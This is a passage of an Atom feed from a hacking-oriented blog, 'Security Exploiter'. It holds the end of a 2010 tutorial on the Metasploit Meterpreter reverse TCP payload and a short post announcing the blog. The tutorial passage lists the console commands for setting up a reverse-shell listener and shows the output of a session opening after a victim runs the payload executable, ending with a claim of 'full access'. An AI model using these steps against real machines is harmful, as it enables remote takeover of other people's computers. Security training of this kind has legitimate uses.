&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Open Metasploit Console and type this:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;"use multi/handler"&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;"set PAYLOAD windows/meterpreter/reverse_tcp"&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;"set LHOST 192.168.1.1" &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;"set LPORT 4444"&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;"exploit"&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="font-family: sans-serif; font-size: 13px; line-height: 19px;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;pre style="background-color: #f9f9f9; border-bottom-color: rgb(47, 111, 171); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(47, 111, 171); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(47, 111, 171); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(47, 111, 171); border-top-style: dashed; border-top-width: 1px; color: black; font-family: monospace, 'Courier New'; font-size: 15px; line-height: 1.1em; padding-bottom: 1em; padding-left: 1em; padding-right: 1em; padding-top: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;msf &amp;gt; use multi/handler
msf exploit(handler) &amp;gt; set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD =&amp;gt; windows/meterpreter/reverse_tcp
msf exploit(handler) &amp;gt; set LHOST 192.168.1.1
LHOST =&amp;gt; 192.168.1.1
msf exploit(handler) &amp;gt; set LPORT 4444
LPORT =&amp;gt; 4444
msf exploit(handler) &amp;gt; exploit
[*] Started reverse handler
[*] Starting the payload handler...&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;So now we have a Listening server running, waiting for the connect back.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Remember&amp;nbsp;to make LHOST and LPORT your own configuration.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;When the exe is clicked and activated you should get the connection and look like this:&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: sans-serif; font-size: 13px; line-height: 19px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;pre style="background-color: #f9f9f9; border-bottom-color: rgb(47, 111, 171); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(47, 111, 171); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(47, 111, 171); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(47, 111, 171); border-top-style: dashed; border-top-width: 1px; color: black; font-family: monospace, 'Courier New'; font-size: 15px; line-height: 1.1em; padding-bottom: 1em; padding-left: 1em; padding-right: 1em; padding-top: 1em;"&gt;msf exploit(handler) &amp;gt; exploit
[*] Started reverse handler on port 4444
[*] Starting the payload handler...
[*] Sending stage (72346 bytes)
[*] Sleeping before handling stage...
[*] Meterpreter session 1 opened (192.168.1.1:4444 -&amp;gt; 192.168.1.2:1060)
 
meterpreter &amp;gt;&lt;/pre&gt;&lt;br /&gt;
&lt;span class="Apple-style-span"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Now we have a meterpreter session and have full access :)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1859513259990287065-673646165242429101?l=securityexploiter.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/w6b1fgdxAWKY_6dbyQQYZ5Tv5C8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/w6b1fgdxAWKY_6dbyQQYZ5Tv5C8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/w6b1fgdxAWKY_6dbyQQYZ5Tv5C8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/w6b1fgdxAWKY_6dbyQQYZ5Tv5C8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityExploiter/~4/NxdsWSNHPP4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://securityexploiter.blogspot.com/feeds/673646165242429101/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://securityexploiter.blogspot.com/2010/11/intro-metasploit-meterpreter-reverse.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/673646165242429101?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/673646165242429101?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SecurityExploiter/~3/NxdsWSNHPP4/intro-metasploit-meterpreter-reverse.html" title="Intro: Metasploit Meterpreter Reverse TCP Payload exe at First Glance" /><author><name>Security Exploiter</name><uri>http://www.blogger.com/profile/17393169150191998081</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://securityexploiter.blogspot.com/2010/11/intro-metasploit-meterpreter-reverse.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkINQ388cCp7ImA9Wx9TGEs.&quot;"><id>tag:blogger.com,1999:blog-1859513259990287065.post-286104114978540006</id><published>2010-11-27T04:23:00.000-08:00</published><updated>2010-11-27T04:23:12.178-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-11-27T04:23:12.178-08:00</app:edited><title>New Security Blog!!</title><content type="html">&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Because of good amounts of interest on my YouTube videos I have decided to create a blog to help explain my videos which will help you the view. As well&amp;nbsp;as just posting my videos here i will also be giving you extra security updates and tips.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;This is also be a place where you can ask questions etc.... &amp;nbsp;I will keep this blog updated&amp;nbsp;regularly&amp;nbsp;and&amp;nbsp;I&amp;nbsp;will respond as quick as possible.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Oh and please tell me what you think to the blog ..............if &lt;/span&gt;im&lt;span class="Apple-style-span" style="color: #38761d;"&gt; missing anything or you want to suggest&amp;nbsp;something&amp;nbsp;that might improve it or something then please feel free.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1859513259990287065-286104114978540006?l=securityexploiter.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Zi-dpnRAhg6vbI5wy_iW8XeE7JY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Zi-dpnRAhg6vbI5wy_iW8XeE7JY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Zi-dpnRAhg6vbI5wy_iW8XeE7JY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Zi-dpnRAhg6vbI5wy_iW8XeE7JY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityExploiter/~4/D9ay93ftkIk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://securityexploiter.blogspot.com/feeds/286104114978540006/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://securityexploiter.blogspot.com/2010/11/new-security-blog.html#comment-form" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/286104114978540006?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/286104114978540006?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SecurityExploiter/~3/D9ay93ftkIk/new-security-blog.html" title="New Security Blog!!" /><author><name>Security Exploiter</name><uri>http://www.blogger.com/profile/17393169150191998081</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>3</thr:total><feedburner:origLink>http://securityexploiter.blogspot.com/2010/11/new-security-blog.html</feedburner:origLink></entry></feed>

